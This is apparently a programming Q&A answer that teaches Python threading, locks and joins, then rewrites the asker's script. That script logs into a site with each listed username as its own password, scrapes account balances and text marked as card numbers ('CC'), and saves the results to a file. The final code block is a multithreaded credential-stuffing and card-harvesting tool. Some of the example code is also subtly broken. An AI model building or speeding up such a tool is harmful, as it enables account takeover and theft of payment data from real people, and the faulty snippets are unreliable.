As bmcculley as mentioned, you can refer to this question for reference, or you can refer to the docs.
How to multithread
Multithreading in Python can be done through the threading
module. You will need to know how to create a thread, how to lock and join them for your case.
Create a thread
To create a thread, you will need to make a class for your thread. The class will subclass threading.Thread
.
import threading
class MyThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
# Your code here
You can add arguments as a normal class would have as well.
Run a thread
After you create a class for your thread, you can then make a thread:
thread = MyThread()
and run it:
thread.start()
Locking multiple threads
Locking threads prevent threads from using a resource all at the same time. This is needed for your case as your threads will be writing to saida.txt
and printing to standard output.
Let's say you have a thread WriteThread
that writes some text to a file:
import threading
class WriteThread(threading.Thread):
def __init__(self, text, output):
threading.Thread.__init__(self)
self.text = text
self.output = output
def run(self):
output.write(text)
with open("output.txt", "a+") as f:
# Create threads
thread_a = WriteThread("foo", f)
thread_b = WriteThread("bar", f)
# Start threads
thread_a.start()
thread_b.start()
The program may still work but it is not a good idea to allow them to access the same file concurrently. Instead, a lock is used when thread_a
is writing to the file to prevent thread_b
from writing to the file.
import threading
file_lock = threading.Lock()
class WriteThread(threading.Thread):
def __init__(self, text, output):
threading.Thread.__init__(self)
self.text = text
self.output = output
def run(self):
# Acquire Lock
file_lock.acquire()
output.write(text)
# Release Lock
file_lock.release()
with open("output.txt", "a+") as f:
# Create threads
a = WriteThread("foo", f)
b = WriteThread("bar", f)
# Start threads
a.start()
b.start()
What file_lock.acquire()
means is that the thread will wait until another thread release
s file_lock
so that it can use the file.
Joining multiple threads
Joining threads is a way to synchronize all the threads together. When multiple threads are joined, they will need to wait until all of the threads are complete before proceeding.
Let's say I have two threads that have different code execution times and I want both of them to complete whatever they are doing before proceeding.
import threading
import time
class WaitThread(threading.Thread):
def __init__(self, time_to_wait, text):
threading.Thread.__init__(self)
self.time_to_wait = time_to_wait
self.text = text
def run(self):
# Wait!
time.sleep(self.time_to_wait)
print self.text
# Thread will wait for 1 second before it finishes
thread_a = WaitThread(1, "Thread a has ended!")
# Thread will wait for 2 seconds before it finishes
thread_b = WaitThread(2, "Thread b has ended!")
threads = []
threads.append(thread_a)
threads.append(thread_b)
# Start threads
thread_a.start()
thread_b.start()
# Join threads
for t in threads:
t.join()
print "Both threads have ended!"
In this example, thread_a
will print first before thread_b
prints. However, it will execute print "Both threads have ended!"
only after both thread_a
and thread_b
have printed.
Application
Now, back to your code.
I have made quite a few changes besides implementing multithreading, locking and joining but the whole idea is to have two locks (one for printing and one for writing to your file) and to execute them in a certain limit. (too many threads is not good! Refer to this question)
import mechanize
from bs4 import BeautifulSoup as BS
import threading
# Max no. of threads allowed to be alive.
limit = 10
entrada = "entrada.txt"
saida = "saida.txt"
def write(text):
with open(saida, "a") as f:
f.write(text)
# Threading locks
fileLock = threading.Lock()
printLock = threading.Lock()
def print_out(text):
printLock.acquire()
print text
printLock.release()
# Thread for each user
class UserThread(threading.Thread):
def __init__(self, user):
threading.Thread.__init__(self)
self.user = user.rstrip()
def run(self):
to_file = ""
try:
cont = 1
# Initialize Mechanize
br = mechanize.Browser()
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
br.set_handle_robots(False)
br.open("https://site")
# Submit form
br.select_form(nr=0)
br["username"] = self.user
br["password"] = self.user
br.submit()
# Soup Response
soup = BS(br.response().read(), "lxml")
value = soup.find_all("a")
# Write to file
txt = "\nConta - Saldo["+value[2].text+"]\n"
print_out(txt)
to_file += txt
# Retrieve response from another page
br.open("https://test/sub")
soup = BS(br.response().read(), "lxml")
# Write to file
txt = "Procurando por cartoes na conta"
print_out(txt)
to_file += txt
for tds in soup.find_all("td"):
if len(tds.text) > 30:
# Write to file
cc = "CC["+str(cont)+"] ~> "+tds.text+"\n"
print_out(cc)
to_file += cc
cont += 1
txt = "\nTotal ["+str(cont-1)+"]\n-------------------------------------------------\n"
to_file += txt
except Exception:
erro = "\n[!]Erro ao logar["+self.user+"]\n-------------------------------------------------\n"
to_file += erro
print_out(erro)
# Write everything to file
fileLock.acquire()
write(to_file)
fileLock.release()
threads = []
with open(entrada) as fp:
for user in fp:
threads.append(UserThread(user))
active_threads = []
for thread in threads:
if len(active_threads) <= limit:
# Start threads
thread.start()
active_threads.append(thread)
else:
for t in active_threads:
# Wait for everything to complete before moving to next set
t.join()
active_threads = []
Minor Edits:
Changed all single quotes to double quotes
Added spacings between operators and where needed
Removed unused variable ua
Replaced unused variables response = br.submit()
and response = br.open("https://test/sub")
to br.submit()
and br.open("https://test/sub")